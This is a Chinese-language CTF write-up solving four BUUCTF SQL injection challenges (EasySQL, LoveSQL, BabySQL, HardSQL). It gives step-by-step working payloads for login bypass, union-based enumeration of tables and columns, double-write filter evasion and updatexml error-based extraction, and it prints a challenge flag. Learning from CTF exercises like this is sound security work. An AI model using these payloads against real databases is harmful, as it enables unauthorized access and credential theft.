BUUCTF WEB笔记之[极客大挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL

小白一个，记录一下解题过程，如有错误请指正！

一、EasySQL

1.这里我们使用一句话万能密码就可以了，记得加上#

1' or '1'='1'#

2.登录就可以拿到flag

 

二、LoveSQL

        网页里说用sqlmap是没有灵魂滴，但是还是手痒试了一下，发现什么都扫不出来，可能是我太菜了能力还没到家，希望有大佬能指点一下~

1.我们只能运用灵魂了，用万能句尝试一下，发现登录进来了，但是没有flag

 2.猜测flag应该是放在某个字段里了，我们用联合注入（union）看一下列数

1' union select 1,2,3#

登录成功，列数再加1，发现报错了，说明列数有三列，第二第三列有回显

1' union select 1,2,3,4#

 3.开始爆数据库

1' union select 1,2,database()#

4.数据库名为geek,爆表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#

 5.很显然l0ve1ysq1是我们想要的表，谁让他和题目长得很像呢~，爆字段

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

 6.flag应该在username或者password里了，用concat_ws函数连起来全部看一下。

1' union select 1,2,group_concat(concat_ws('~',username,password)) from geek.l0ve1ysq1#

 太长了看不完，直接看网页源代码即可

三、BabySQL

1.还是先用万能句试一下，发现不行了，应该是设置了关键字过滤,用burp看一下过滤了那些关键字

 

or,and,union,select,where等都被过滤了，试了一下改大小写，双写，发现双写注入是可以的

1' oorr '1'='1'#

 2.那我们就是用双写注入，查一下列数,发现还是只有三列

1' ununionion selselectect 1,2,3#

3.爆数据库

1' ununionion selselectect 1,2,database()#

 

4.熟悉的数据库名，开始爆表名 

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

5.爆字段

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

 

6.查看username，password两个字段

1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql#

 

 7.查看网页源代码就可以看到完整的flag了

 四、HardSQL

1.在这一题发现万能句，双写都不能用了，总是出现这样一个页面

2.应该还是把某些关键字过滤掉了，用burp再fuzz一下，发现空格，union，*，=都被过滤了，但是updatexml和extractvalue没被过滤，可以考虑使用报错注入

3.因为空格和*号都被过滤掉了，就不能使用/**/绕过空格了，不过可以使用（）绕过，爆数据库

1'or(updatexml(1,concat('~',(select(database()))),1))#

 4.又是熟悉的数据库名，开始爆表名

1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('%geek%'))),1))#

5.爆字段

1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('%H4rDsq1%'))),1))#

6.查看username,password ,不过根据经验应该是在password里是没错了

1'or(updatexml(1,concat('~',(select(group_concat(concat_ws('~',username,password)))from(geek.H4rDsq1))),1))#

7.没显示完全，因为updatexml函数只能显示前32位，但是mid，substr函数也被过滤掉了，那可以使用right函数

1'or(updatexml(1,concat('~',(select(right(concat_ws('~',username,password),30))from(geek.H4rDsq1))),1))#   

8.拼起来就是flag啦

flag{651cd7be-7e7e-4463-9bee-9b451fc0039d} 

参考文章：

https://cloud.tencent.com/developer/article/1740429
https://www.cnblogs.com/Mr-small/p/13473910.html

https://www.cnblogs.com/sipc-love/p/14266070.html